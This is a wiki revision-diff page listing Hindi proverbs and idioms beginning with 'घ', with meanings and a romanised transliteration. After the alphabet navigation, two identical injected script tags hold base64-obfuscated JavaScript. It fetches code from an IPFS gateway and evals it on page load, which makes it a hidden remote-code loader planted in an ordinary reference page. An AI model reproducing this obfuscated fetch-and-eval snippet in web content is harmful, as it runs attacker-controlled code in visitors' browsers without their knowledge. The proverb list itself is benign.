Difference between revisions of "कहावत लोकोक्ति मुहावरे-घ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "चीज " to "चीज़ ")
m (Text replacement - "{{कहावत लोकोक्ति मुहावरे}}" to "{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}")
 
(12 intermediate revisions by 3 users not shown)
Line 1: Line 1:
{{कहावत लोकोक्ति मुहावरे}}
+
{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}
 
+
{| class="bharattable-pink"
{| class="bharattable"
 
 
|-
 
|-
!कहावत लोकोक्ति मुहावरे
+
! style="width:30%"| कहावत लोकोक्ति मुहावरे
!अर्थ
+
! style="width:70%"| अर्थ
 
|-
 
|-
| style="width:30%"|
+
| 1- घर में नहीं हैं दाने और अम्मा चली भुनाने।
1- घर में नहीं हैं दाने और अम्मा चली भुनाने।
+
| अर्थ - झूठी शान दिखाना, न होने पर ढोंग करना।
| style="width:70%"|
 
अर्थ -झूठी शान दिखाना, न होने पर ढोंग करना।
 
 
|-
 
|-
 
|2- घड़ी में घर जले, अढ़ाई घड़ी भद्रा।
 
|2- घड़ी में घर जले, अढ़ाई घड़ी भद्रा।
|
+
| अर्थ - संकट को होशियारी से दूर करें।
अर्थ - संकट को होशियारी से दूर करें।
 
 
|-
 
|-
 
|3- घड़ी में तोला, घड़ी में माशा।
 
|3- घड़ी में तोला, घड़ी में माशा।
|
+
| अर्थ - चंचल मन वाला।
अर्थ - चंचल मन वाला।
 
 
|-
 
|-
 
|4- घर आए कुत्ते को भी नहीं निकालते।
 
|4- घर आए कुत्ते को भी नहीं निकालते।
|
+
|अर्थ - घर में आने वाले का सत्कार करना चाहिए।
अर्थ - घर में आने वाले का सत्कार करना चाहिए।
 
 
|-
 
|-
 
|5- घर का जोगी जोगना, आन गाँव का सिद्ध।
 
|5- घर का जोगी जोगना, आन गाँव का सिद्ध।
|
+
|अर्थ - अपने घर में योग्यता का आदर नहीं होता और बाहर का व्यक्ति योग्य समझा जाता है।
अर्थ - अपने घर में योग्यता का आदर नहीं होता और बाहर का व्यक्ति योग्य समझा जाता है।
 
 
|-
 
|-
 
|6- घर का भेदी लंका ढाए।
 
|6- घर का भेदी लंका ढाए।
|
+
|अर्थ - घर की फूट का परिणाम बुरा होता है।
अर्थ - घर की फूट का परिणाम बुरा होता है।
 
 
|-
 
|-
 
|7- घर की खांड़ किरकिरी, लगे पड़ोसी का गुड़ मीठा।
 
|7- घर की खांड़ किरकिरी, लगे पड़ोसी का गुड़ मीठा।
|
+
| अर्थ - अपनी वस्तु़ ख़राब लगती है और दूसरे की अच्छी।
अर्थ - अपनी वस्तु़ खराब लगती है और दूसरे की अच्छी।
 
 
|-
 
|-
 
|8- घर की मुर्गी दाल बराबर।
 
|8- घर की मुर्गी दाल बराबर।
|
+
| अर्थ -   अपनी चीज़ या अपने आदमी की क़दर नहीं होती।
अर्थ - अपनी चीज़ या अपने आदमी की कदर नहीं होती।
 
 
|-
 
|-
 
|9- घर खीर तो, बाहर खीर।
 
|9- घर खीर तो, बाहर खीर।
|
+
| अर्थ - अपने पास कुछ हो तो, बाहर भी आदर होता है।  
अर्थ - अपने पास कुछ हो तो, बाहर भी आदर होता है।  
 
 
|-
 
|-
 
|10- घर का घोड़ा, नखास मोल।
 
|10- घर का घोड़ा, नखास मोल।
|
+
| अर्थ - चीज़ घर में पड़ी है और उसकी कोई कीमत नहीं है।
अर्थ - चीज़ घर में पड़ी है और उसकी कोई कीमत नहीं है।
 
 
|-
 
|-
 
|11- घायल की गति घायल जाने।
 
|11- घायल की गति घायल जाने।
|
+
| अर्थ - जो कष्ट भोगता है वही दूसरों का कष्ट समझता है।।
अर्थ - जो कष्ट भोगता है वही दूसरों का कष्ट समझता है।।
 
 
|-
 
|-
 
|12- घी कहाँ गया ? खिचड़ी में।
 
|12- घी कहाँ गया ? खिचड़ी में।
|
+
| अर्थ - वस्तु का प्रयोग ठीक जगह हो गया।
अर्थ - वस्तु का प्रयोग ठीक जगह हो गया।
 
 
|-
 
|-
 
|13- घी सँवारे काम, बड़ी बहू का नाम।
 
|13- घी सँवारे काम, बड़ी बहू का नाम।
|
+
| अर्थ - काम तो साधन से हुआ, नाम करने वाले का हो गया।
अर्थ - काम तो साधन से हुआ, नाम करने वाले का हो गया।
 
 
|-
 
|-
 
|14- घोड़ा घास से यारी करेगा तो खाएगा क्या।
 
|14- घोड़ा घास से यारी करेगा तो खाएगा क्या।
|
+
| अर्थ - पेशेवर को किसी की से रियायत नहीं करनी चाहिए।
अर्थ - पेशेवर को किसी की से रियायत नहीं करनी चाहिए।
 
 
|-
 
|-
 
|15- घोड़े की दुम बढ़ेगी तो अपनी ही मक्खियाँ उड़ाएगा।
 
|15- घोड़े की दुम बढ़ेगी तो अपनी ही मक्खियाँ उड़ाएगा।
|
+
| अर्थ - उन्नति करके आदमी अपना ही भला करता है।
अर्थ - उन्नति करके आदमी अपना ही भला करता है।
 
 
|-
 
|-
 
|16- घोड़े को लात, आदमी को बात।
 
|16- घोड़े को लात, आदमी को बात।
|
+
| अर्थ - उत्तम वस्तु  थोड़ी भी हो तो अच्छी है।।
अर्थ - उत्तम वस्तु  थोड़ी भी हो तो अच्छी है।।
 
 
|-
 
|-
 
|17- घडियाँ गिनना।
 
|17- घडियाँ गिनना।
|
+
|अर्थ - बेचैनी से प्रतीक्षा करना।   
अर्थ - बेचैनी से प्रतीक्षा करना।   
 
 
|-
 
|-
 
|18- घड़ों पानी पड़ जाना।
 
|18- घड़ों पानी पड़ जाना।
|
+
|अर्थ - बहुत शर्मिंदा होना।  
अर्थ - बहुत शर्मिंदा होना।  
 
 
|-
 
|-
|19- घर काट खाने को आना।
+
|19- घर काट खाने को आना/घर काटने का दौड़ना।
|
+
|अर्थ - अकेलापन अखरना।  
अर्थ - अकेलापन अखरना।  
 
 
|-
 
|-
 
|20- घर का न घाट का।
 
|20- घर का न घाट का।
|
+
|अर्थ - कहीं का भी नहीं रहना।
अर्थ - कहीं का भी नहीं रहना।
 
 
|-
 
|-
 
|21- घर फूँक तमाशा देखना।
 
|21- घर फूँक तमाशा देखना।
|
+
|अर्थ - अपनी हानि करके मौज उड़ाना।   
अर्थ - अपनी हानि करके मौज उड़ाना।   
 
 
|-
 
|-
 
|22- घर में गंगा बहना।
 
|22- घर में गंगा बहना।
|
+
|अर्थ - अच्छी चीज़ पास ही में मिल जाना।
अर्थ - अच्छी चीज़ पास ही में मिल जाना।
 
 
|-
 
|-
 
|23- घाव पर नमक छिड़कना।
 
|23- घाव पर नमक छिड़कना।
|
+
|अर्थ - दु:खी को और दु:खी करना।
अर्थ - दु:खी को और दु:खी करना।
 
 
|-
 
|-
 
|24- घाव हरा करना।
 
|24- घाव हरा करना।
|
+
|अर्थ - भूले हुए दु:ख की याद दिलाना।  
अर्थ - भूले हुए दु:ख की याद दिलाना।  
 
 
|-
 
|-
 
|25- घास काटना।
 
|25- घास काटना।
|
+
|अर्थ - फूहड़ काम करना। ।
अर्थ - फूहड़ काम करना। ।
 
 
|-
 
|-
 
|26- घास छीलना।
 
|26- घास छीलना।
|
+
|अर्थ - व्यर्थ समय गवाँना।।  
अर्थ - व्यर्थ समय गवाँना।।  
 
 
|-
 
|-
 
|27- घिग्घी बँधना।
 
|27- घिग्घी बँधना।
|
+
|अर्थ - स्पष्ट बोल न सकना।
अर्थ - स्पष्ट बोल न सकना।
 
 
|-
 
|-
 
|28- घी घना मुट्ठी चना।
 
|28- घी घना मुट्ठी चना।
|
+
|अर्थ - जो मिल जाए उसी पर संतुष्ट रहना चाहिए।
अर्थ -  
 
 
|-
 
|-
 
|29- घी के दिये जलना।
 
|29- घी के दिये जलना।
|
+
|अर्थ - आनंद मंगल होना, खुशियाँ मनाना।
अर्थ - आनंद मंगल होना, खुशियाँ मनाना।
 
 
|-
 
|-
 
|30- घी खिचड़ी होना।
 
|30- घी खिचड़ी होना।
|
+
|अर्थ - खूब मिल- जुल जाना।।  
अर्थ - खूब मिल- जुल जाना।।  
 
 
|-
 
|-
 
|31- घोंघा बसंत।
 
|31- घोंघा बसंत।
|
+
|अर्थ - मूर्ख होना।
अर्थ - मूर्ख होना।
 
 
|-
 
|-
 
|32- घोड़े बेचकर सोना।
 
|32- घोड़े बेचकर सोना।
|
+
|अर्थ - निश्चिंत हो जाना।
अर्थ - निश्चिंत हो जाना।  
+
|-
 +
|33- घँघोल डालना।
 +
|अर्थ - गँदला  या गंदा  कर देना।
 +
|-
 +
|34- घंटा दिखाना।
 +
|अर्थ - ऐसा उत्तर देना या मुद्रा बनाना जिससे आवेदक या इच्छुक पूरी तरह से निराश हो जाए।
 +
|-
 +
|35- [[घंटा हिलाना]]।
 +
|अर्थ - व्यर्थ बैठे रहना, व्यर्थ का काम करना।
 +
|-
 +
|36- [[घट घट में बसना]]।
 +
|अर्थ - हर एक में व्याप्त होना।
 +
|-
 +
|37- घंटे मोरछल से उठाना।
 +
|अर्थ - गाजे-बाजे के साथ किसी भाग्यवान की अर्थी निकालना।
 +
|-
 +
|38- [[घड़ियाँ गिनना]]।
 +
|अर्थ -अत्यंत उत्सुकतापूर्वक प्रतीक्षा करना, मरणासन्न होना, मृत्यु की इंतजार में होना।
 +
|-
 +
|39- [[घड़ी टेढ़ी होना]]।
 +
|अर्थ - समय विपरीत होना।
 +
|-
 +
|40- [[घड़ी दो घड़ी का]]।
 +
|अर्थ - कुछ ही क्षणों का।
 +
|-
 +
|41- [[घड़ी पहाड़ हो जाना]]।
 +
|अर्थ - थोड़ा समय भी न बीतना
 +
|-
 +
|42- [[घड़ो पानी पड़ना]]।
 +
|अर्थ - लोगों के सामने हेय या हीन सिद्ध होने पर अत्यन्त लज्जित होना।
 +
|-
 +
|43- [[घपले में पड़ना|घपले में पड़ना/पड़ जाना]]।
 +
|अर्थ - खटाई में पड़ना, भ्रमित होना।
 +
|-
 +
|44- [[घबरा उठना]]।
 +
|अर्थ - बेचैन होना।
 +
|-
 +
|45- [[घमंड में चूर]]।
 +
|अर्थ - घमंड से ओतप्रोत।
 +
|-
 +
|46- [[घर आँगन हो जाना]]।
 +
|अर्थ - घर का टूट-फूट कर खँडहर या मैदान हो जाना
 +
|-
 +
|47- [[घर उजड़ना|घर उजड़ना/उजाड़ देना]]।
 +
|अर्थ - गृहस्थी चौपट होना।
 +
|-
 +
|48- [[घर कर लेना]]।
 +
|अर्थ - अपनी स्थायी निवास बना लेना।
 +
|-
 +
|49- [[घर का आदमी]]।
 +
|अर्थ - परिवार का सदस्य, घनिष्ठ मित्र अथवा संबंधी।
 +
|-
 +
|50- घर का रास्ता समझना।
 +
|अर्थ - सुगम और सुपरिचित समझना।
 +
|-
 +
|51- घर के घर
 +
|अर्थ - घर की सीमा में ही, आपस में ही।
 +
|-
 +
|52- [[घर के घर रह जाना]]।
 +
|अर्थ - ऐसी स्थिति में होना कि व्यापार, लेन देन आदि में न लाभ हो न हानि।
 +
|-
 +
|53- घर ख़ाली छोड़ना।
 +
|अर्थ - वर करते हुए भी आघात या प्रहार न करना, बल्कि जान बूझकर ख़ाली जाने देना।
 +
|-
 +
|54- [[घर खोद डालना]]।
 +
|अर्थ - बार बार किसी के घर जाकर उसे परेशान करना।
 +
|-
 +
|55- घर जमाना।
 +
|अर्थ - घर गृहस्थी के लिए आवश्यक वस्तुएँ लाना।
 +
|-
 +
|56- [[घर तक पहुँचना]]।
 +
|अर्थ - किसी को माँ बहन तक की गालियाँ देना।
 +
|-
 +
|57- [[घर में चूल्हा न जलना]]।
 +
|अर्थ - रसोई न बनना। इन्हीं परेशानियों के कारण हमारे यहाँ दो दिन चूल्हा तक नहीं जला।
 +
|-
 +
|58- [[घर में झाड फिरना|घर में झाड फिरना/फिर जाना]]।
 +
|अर्थ - घर में कुछ भी न रह जाना।
 +
|-
 +
|59- [[घर फूँक तमाशा देखना]]।
 +
|अर्थ - घर गृहस्थी चौपट या नष्ट करना।
 +
|-
 +
|60- [[घर बचाना]]।
 +
|अर्थ - अपने कौशल या चातुराई से प्रहार या बात विफल करना।
 +
|-
 +
|61- घर बनाना।
 +
|अर्थ - घर में सुख सुविधाओं की व्यवस्था करना।
 +
|- 
 +
|62- घर फोड़ना।
 +
|अर्थ - परिवार के लोगों में परस्पर झगड़ा लगाकर उनमें फूट डालना।
 +
|- 
 +
|63-[[घर बोलने लगना]]।
 +
|अर्थ - घर में चहल पहल होने लगना।
 +
|-
 +
|64-[[घर बैठे]]।
 +
| अर्थ -  बिना दौड धूप या प्रयास किए।
 +
|-
 +
|65- [[घर लुटाना]]।
 +
|अर्थ - घर की सम्पत्ति गँवाना या व्यर्थ खर्च करना।
 +
|-
 +
|66- [[घर सिर पर उठाना|घर सिर पर उठाना/उठा लेना]]।
 +
|अर्थ - बहुत अधिक शोर मचाना या हो हल्ला करना।
 +
|-
 +
|67- [[घर जमाई बनना]]।
 +
|अर्थ - दामाद का ससुराल में जाकर रहना।
 +
|-
 +
|68-[[घर द्वार देखना]]।
 +
|अर्थ - गृहस्थी सँभालना और उसकी रक्षा करना।
 +
|- 
 +
|69- घरवाली।
 +
| अर्थ -  पत्नी।
 +
|-
 +
|70- घर्राटा मारना/लेना।
 +
|अर्थ - खूब गहरी नींद सोना।
 +
|-
 +
|71- [[घसीटना]]।
 +
|अर्थ - उलझाना।
 +
|-
 +
|72- [[घाट घाट का पानी पीना]]।
 +
|अर्थ - अनेक स्थलों अथवा उनके निवासियों का रंग-ढंग देखे होना, उनके सम्पर्क या सहवास में आये होना अथवा विविध अनुभव प्राप्त किए होना अनुभवी होना
 +
|-
 +
|73- घाट नहाना।
 +
|अर्थ - किसी के मरने पर नदी पर नहाना।
 +
|-
 +
|74- घाट लगना।
 +
|अर्थ - नदी आदि के किनारे नाव का खड़ा होना।
 +
|-
 +
|75- [[घाटा उठाना|घाटा उठाना/आना/ पड़ना]]।
 +
|अर्थ - व्यापार में हानि होना, नुक्सान होना, कमी होना।
 +
|-
 +
|76- [[घाटा भरना|घाटा भरना/भर देना]]।
 +
|अर्थ - क्षतिपूर्ति करना।
 +
|-
 +
|77- घात ताकना।
 +
| अर्थ - उपयुक्त अवसर की ताक में रहना।
 +
|- 
 +
|78- [[घात में पड़ना]]।
 +
|अर्थ - ऐसी स्थिति में किसी का आना कि उस पर सहज में वार किया जा सके, फँसना, घिरना।
 +
|- 
 +
|79- [[घाम का जाना]]।
 +
|अर्थ - तेज़ धूप के कारण सूखना या काला पड़ना।
 +
|-
 +
|80- [[घाम खाना]]।
 +
|अर्थ - सरदी से बचने के लिए धूप में बैठना।
 +
|- 
 +
|81-घाम बचाना।
 +
|अर्थ - विपत्ति या संकट से स्वयं बचना या किसी को बचाना।
 +
|- 
 +
|82- घाम लगना।
 +
|अर्थ - लू लगना।
 +
|- 
 +
|83- घाव खाना।
 +
|अर्थ - आघात या प्रहार सहने के कारण घायल होना।
 +
|-
 +
|84- घाव खाना।
 +
|अर्थ - आघात या प्रहार सहने के कारण घायल होना।
 +
|-
 +
|85- [[घाव पर नमक छिड़कना]]।
 +
|अर्थ - दुखी व्यक्ति को और अधिक यंत्रणा देना।
 +
|-
 +
|86- घाव पुजना/भरना।
 +
|अर्थ - क्षत या घाव के भरने के समय अंकुर निकलना।
 +
|-
 +
|87- [[घाव हरा होना|घाव हरा होना/ हो जाना]]।
 +
|अर्थ - कष्ट या दु:ख की घड़ी याद आना और फलतः वही पुराना कष्ट या दु:ख अनुभूत करना।
 +
|-
 +
|88- घास खाए होना।
 +
|अर्थ - दिमाग में घास भरी होने के कारण बेवकूफ़ी की बातें करना।
 +
|-
 +
|89- घास छीलना/खोदना।
 +
|अर्थ - तुच्छ या बेकार हो जाना।
 +
|-
 +
|90- [[घिग्घी बँधना|घिग्घी बँधना/बँध जाना]]।
 +
|अर्थ - भय से आतंकित हो जाने के कारण कंठ का अवरुद्ध हो जाना।
 +
|-
 +
|91- घिरनी खाना।
 +
|अर्थ - चारो और चक्कर खाना।
 +
|-
 +
|92- घी का कुप्पा लुढ़कना।
 +
|अर्थ - किसी धनी आदमी का मरना, बहुत बड़ी हानि होना।
 +
|-
 +
|93- [[घी के कुप्पे से लगना]]।
 +
|अर्थ - किसी ऐसे व्यक्ति का आश्रय प्राप्त होना जिसके फलस्वरूप बहुत अधिक लाभ हो।
 +
|-
 +
|94- घी खिचड़ी होना।
 +
|अर्थ - परस्पर अत्यधिक घनिष्ठता या मेल जोल होना।
 +
|-
 +
|95- घी बरसाना।
 +
|अर्थ - आग में तेल डालना, झगड़े को और बढ़ाना।
 +
|-
 +
|96- घुंघरू बाँधना।
 +
|अर्थ - नाचने के लिए तैयार होना।
 +
|-
 +
|97- घुघरू बोलना।
 +
|अर्थ - मरने के समय गले से घुर घुर शब्द निकलना।
 +
|-
 +
|98- [[घुट घुटकर मरना]]।
 +
|अर्थ - बराबर एक पर एक कष्ट भोगते हुए मरना।
 +
|-
 +
|99- [[घुटते रहना]]।
 +
| अर्थ - छमित इच्छाओं के कारण पीडि़त रहना।
 +
|-
 +
|100- [[घुटना]]।
 +
|अर्थ - घनिष्ठता होना।
 +
|-
 +
|101- [[घुटने टेकना|घुटने टेकना/टेक देना]]।
 +
|अर्थ - हार मान लेना, आत्मसमर्पण कर देना।
 +
|-
 +
|102- [[घुटा निकलना]]।
 +
|अर्थ - छिपा रूस्तम या बहुत होशियार निकलना।
 +
|-
 +
|103- घुटटी में पड़ना।
 +
|अर्थ - बचपन से आदत पड़ी होना, स्वभाव होना।
 +
|-
 +
|104- [[घुन की तरह चाट जाना]]।
 +
|अर्थ - अन्दर ही अन्दर खा जाना या नष्ट कर डालना।
 +
|-
 +
|105- घुन लगना/लग जाना।
 +
|अर्थ - किसी ऐसे दोष, रोग या चिंता से ग्रस्त होना जो जानलेवा सिद्ध हो रही हो।
 +
|-
 +
|106- [[घुल घुलकर बातें करना]]।
 +
|अर्थ - ख़ूब प्रेम से बातें करना।
 
|-
 
|-
 +
|107- [[घुल मिल जाना]]।
 +
|अर्थ - एक हो जाना।
 +
|-
 +
|108- घुला घुलाकर मारना।
 +
|अर्थ - ऐसी स्थिति उत्पन्न करना कि कोई बराबर कष्ट भोगता मर जाए।
 +
|-
 +
|109- [[घुलाना]]।
 +
|अर्थ - ऐसा काम करना कि जिससे कोई घुल घुलकर क्षीण हो जाए।
 +
|-
 +
|110- [[घुसकर बैठना]]।
 +
|अर्थ - किसी के साथ सटकर बैठना, अथवा किसी की आड़ में छिपकर बैठना।
 +
|-
 +
|111- [[घूँघट करना]]।
 +
|अर्थ - न करना, स्त्री का अपने चेहरे का पल्ले से ढ़कना।
 +
|-
 +
|112- घूँघट उठाना।
 +
|अर्थ - स्त्री का किसी के सम्मुख पर्दा।
 +
|-
 +
|113- [[घूँट जाना]]।
 +
|अर्थ - पी जाना, चुपचाप सहन कर लेना।
 +
|-
 +
|114- [[घूम पड़ना]]।
 +
|अर्थ - आवेश या क्रोध में आकर किसी दूसरे से बातें करने लगना।
 +
|-
 +
|115- [[घेर घार करना]]।
 +
|अर्थ - अनुचित दबाव डालना तथा विवश करना।
 +
|-
 +
|116-घोटाले मे पड़ना।
 +
|अर्थ - धन आदि का ऐसी स्थिति में होना कि उसकी वसूली होने की संभावना क्षीण हो।
 +
|-
 +
|117- घोड़ा उठाना।
 +
|अर्थ - घोड़े को तेज दौड़ाना।
 +
|-
 +
|118- घोड़ा उलाँगना।
 +
|अर्थ - किसी नए घोड़े पर पहले-पहले सवारी करना।
 +
|-
 +
|119- घोड़ा खोलना।
 +
|अर्थ - घोड़े का साज खोलना।
 +
|-
 +
|120-घोड़ा निकालना।
 +
|अर्थ - घोड़े को सवारी के योग्य बनाना।
 +
|-
 +
|121- [[घोड़े पर चढ़े चले आना]]।
 +
|अर्थ - कहीं पहुँचते ही वहाँ से चलने की रट लगाने लगना।
 +
|-
 +
|122- [[घोल कर पी जाना]]।
 +
|अर्थ - अस्तित्व ही न रहने देना।
 
|}
 
|}
 
 
  
 
[[Category:कहावत_लोकोक्ति_मुहावरे]]
 
[[Category:कहावत_लोकोक्ति_मुहावरे]]
 +
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:05, 20 April 2018

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kahavat lokokti muhavare arth
1- ghar mean nahian haian dane aur amma chali bhunane. arth - jhoothi shan dikhana, n hone par dhoang karana.
2- gh di mean ghar jale, adhaee gh di bhadra. arth - sankat ko hoshiyari se door karean.
3- gh di mean tola, gh di mean masha. arth - chanchal man vala.
4- ghar ae kutte ko bhi nahian nikalate. arth - ghar mean ane vale ka satkar karana chahie.
5- ghar ka jogi jogana, an gaanv ka siddh. arth - apane ghar mean yogyata ka adar nahian hota aur bahar ka vyakti yogy samajha jata hai.
6- ghar ka bhedi lanka dhae. arth - ghar ki phoot ka parinam bura hota hai.
7- ghar ki khaan d kirakiri, lage p dosi ka gu d mitha. arth - apani vastu़ kharab lagati hai aur doosare ki achchhi.
8- ghar ki murgi dal barabar. arth - apani chiz ya apane adami ki qadar nahian hoti.
9- ghar khir to, bahar khir. arth - apane pas kuchh ho to, bahar bhi adar hota hai.
10- ghar ka gho da, nakhas mol. arth - chiz ghar mean p di hai aur usaki koee kimat nahian hai.
11- ghayal ki gati ghayal jane. arth - jo kasht bhogata hai vahi doosaroan ka kasht samajhata hai..
12- ghi kahaan gaya ? khich di mean. arth - vastu ka prayog thik jagah ho gaya.
13- ghi sanvare kam, b di bahoo ka nam. arth - kam to sadhan se hua, nam karane vale ka ho gaya.
14- gho da ghas se yari karega to khaega kya. arth - peshevar ko kisi ki se riyayat nahian karani chahie.
15- gho de ki dum badhegi to apani hi makkhiyaan u daega. arth - unnati karake adami apana hi bhala karata hai.
16- gho de ko lat, adami ko bat. arth - uttam vastu tho di bhi ho to achchhi hai..
17- ghadiyaan ginana. arth - bechaini se pratiksha karana.
18- gh doan pani p d jana. arth - bahut sharmianda hona.
19- ghar kat khane ko ana/ghar katane ka dau dana. arth - akelapan akharana.
20- ghar ka n ghat ka. arth - kahian ka bhi nahian rahana.
21- ghar phooank tamasha dekhana. arth - apani hani karake mauj u dana.
22- ghar mean ganga bahana. arth - achchhi chiz pas hi mean mil jana.
23- ghav par namak chhi dakana. arth - du:khi ko aur du:khi karana.
24- ghav hara karana. arth - bhoole hue du:kh ki yad dilana.
25- ghas katana. arth - phooh d kam karana. .
26- ghas chhilana. arth - vyarth samay gavaanna..
27- ghigghi bandhana. arth - spasht bol n sakana.
28- ghi ghana mutthi chana. arth - jo mil jae usi par santusht rahana chahie.
29- ghi ke diye jalana. arth - anand mangal hona, khushiyaan manana.
30- ghi khich di hona. arth - khoob mil- jul jana..
31- ghoangha basant. arth - moorkh hona.
32- gho de bechakar sona. arth - nishchiant ho jana.
33- ghanghol dalana. arth - gandala ya ganda kar dena.
34- ghanta dikhana. arth - aisa uttar dena ya mudra banana jisase avedak ya ichchhuk poori tarah se nirash ho jae.
35- ghanta hilana. arth - vyarth baithe rahana, vyarth ka kam karana.
36- ghat ghat mean basana. arth - har ek mean vyapt hona.
37- ghante morachhal se uthana. arth - gaje-baje ke sath kisi bhagyavan ki arthi nikalana.
38- gh diyaan ginana. arth -atyant utsukatapoorvak pratiksha karana, maranasann hona, mrityu ki iantajar mean hona.
39- gh di tedhi hona. arth - samay viparit hona.
40- gh di do gh di ka. arth - kuchh hi kshanoan ka.
41- gh di paha d ho jana. arth - tho da samay bhi n bitana
42- gh do pani p dana. arth - logoan ke samane hey ya hin siddh hone par atyant lajjit hona.
43- ghapale mean p dana/p d jana. arth - khataee mean p dana, bhramit hona.
44- ghabara uthana. arth - bechain hona.
45- ghamand mean choor. arth - ghamand se otaprot.
46- ghar aangan ho jana. arth - ghar ka toot-phoot kar khandahar ya maidan ho jana
47- ghar uj dana/uja d dena. arth - grihasthi chaupat hona.
48- ghar kar lena. arth - apani sthayi nivas bana lena.
49- ghar ka adami. arth - parivar ka sadasy, ghanishth mitr athava sanbandhi.
50- ghar ka rasta samajhana. arth - sugam aur suparichit samajhana.
51- ghar ke ghar arth - ghar ki sima mean hi, apas mean hi.
52- ghar ke ghar rah jana. arth - aisi sthiti mean hona ki vyapar, len den adi mean n labh ho n hani.
53- ghar khali chho dana. arth - var karate hue bhi aghat ya prahar n karana, balki jan boojhakar khali jane dena.
54- ghar khod dalana. arth - bar bar kisi ke ghar jakar use pareshan karana.
55- ghar jamana. arth - ghar grihasthi ke lie avashyak vastuean lana.
56- ghar tak pahuanchana. arth - kisi ko maan bahan tak ki galiyaan dena.
57- ghar mean choolha n jalana. arth - rasoee n banana. inhian pareshaniyoan ke karan hamare yahaan do din choolha tak nahian jala.
58- ghar mean jhad phirana/phir jana. arth - ghar mean kuchh bhi n rah jana.
59- ghar phooank tamasha dekhana. arth - ghar grihasthi chaupat ya nasht karana.
60- ghar bachana. arth - apane kaushal ya chaturaee se prahar ya bat viphal karana.
61- ghar banana. arth - ghar mean sukh suvidhaoan ki vyavastha karana.
62- ghar pho dana. arth - parivar ke logoan mean paraspar jhag da lagakar unamean phoot dalana.
63-ghar bolane lagana. arth - ghar mean chahal pahal hone lagana.
64-ghar baithe. arth - bina daud dhoop ya prayas kie.
65- ghar lutana. arth - ghar ki sampatti ganvana ya vyarth kharch karana.
66- ghar sir par uthana/utha lena. arth - bahut adhik shor machana ya ho halla karana.
67- ghar jamaee banana. arth - damad ka sasural mean jakar rahana.
68-ghar dvar dekhana. arth - grihasthi sanbhalana aur usaki raksha karana.
69- gharavali. arth - patni.
70- gharrata marana/lena. arth - khoob gahari niand sona.
71- ghasitana. arth - ulajhana.
72- ghat ghat ka pani pina. arth - anek sthaloan athava unake nivasiyoan ka rang-dhang dekhe hona, unake sampark ya sahavas mean aye hona athava vividh anubhav prapt kie hona anubhavi hona
73- ghat nahana. arth - kisi ke marane par nadi par nahana.
74- ghat lagana. arth - nadi adi ke kinare nav ka kh da hona.
75- ghata uthana/ana/ p dana. arth - vyapar mean hani hona, nuksan hona, kami hona.
76- ghata bharana/bhar dena. arth - kshatipoorti karana.
77- ghat takana. arth - upayukt avasar ki tak mean rahana.
78- ghat mean p dana. arth - aisi sthiti mean kisi ka ana ki us par sahaj mean var kiya ja sake, phansana, ghirana.
79- gham ka jana. arth - tez dhoop ke karan sookhana ya kala p dana.
80- gham khana. arth - saradi se bachane ke lie dhoop mean baithana.
81-gham bachana. arth - vipatti ya sankat se svayan bachana ya kisi ko bachana.
82- gham lagana. arth - loo lagana.
83- ghav khana. arth - aghat ya prahar sahane ke karan ghayal hona.
84- ghav khana. arth - aghat ya prahar sahane ke karan ghayal hona.
85- ghav par namak chhi dakana. arth - dukhi vyakti ko aur adhik yantrana dena.
86- ghav pujana/bharana. arth - kshat ya ghav ke bharane ke samay aankur nikalana.
87- ghav hara hona/ ho jana. arth - kasht ya du:kh ki gh di yad ana aur phalatah vahi purana kasht ya du:kh anubhoot karana.
88- ghas khae hona. arth - dimag mean ghas bhari hone ke karan bevakoofi ki batean karana.
89- ghas chhilana/khodana. arth - tuchchh ya bekar ho jana.
90- ghigghi bandhana/bandh jana. arth - bhay se atankit ho jane ke karan kanth ka avaruddh ho jana.
91- ghirani khana. arth - charo aur chakkar khana.
92- ghi ka kuppa ludhakana. arth - kisi dhani adami ka marana, bahut b di hani hona.
93- ghi ke kuppe se lagana. arth - kisi aise vyakti ka ashray prapt hona jisake phalasvaroop bahut adhik labh ho.
94- ghi khich di hona. arth - paraspar atyadhik ghanishthata ya mel jol hona.
95- ghi barasana. arth - ag mean tel dalana, jhag de ko aur badhana.
96- ghuangharoo baandhana. arth - nachane ke lie taiyar hona.
97- ghugharoo bolana. arth - marane ke samay gale se ghur ghur shabd nikalana.
98- ghut ghutakar marana. arth - barabar ek par ek kasht bhogate hue marana.
99- ghutate rahana. arth - chhamit ichchhaoan ke karan pidi़t rahana.
100- ghutana. arth - ghanishthata hona.
101- ghutane tekana/tek dena. arth - har man lena, atmasamarpan kar dena.
102- ghuta nikalana. arth - chhipa roostam ya bahut hoshiyar nikalana.
103- ghutati mean p dana. arth - bachapan se adat p di hona, svabhav hona.
104- ghun ki tarah chat jana. arth - andar hi andar kha jana ya nasht kar dalana.
105- ghun lagana/lag jana. arth - kisi aise dosh, rog ya chianta se grast hona jo janaleva siddh ho rahi ho.
106- ghul ghulakar batean karana. arth - khoob prem se batean karana.
107- ghul mil jana. arth - ek ho jana.
108- ghula ghulakar marana. arth - aisi sthiti utpann karana ki koee barabar kasht bhogata mar jae.
109- ghulana. arth - aisa kam karana ki jisase koee ghul ghulakar kshin ho jae.
110- ghusakar baithana. arth - kisi ke sath satakar baithana, athava kisi ki a d mean chhipakar baithana.
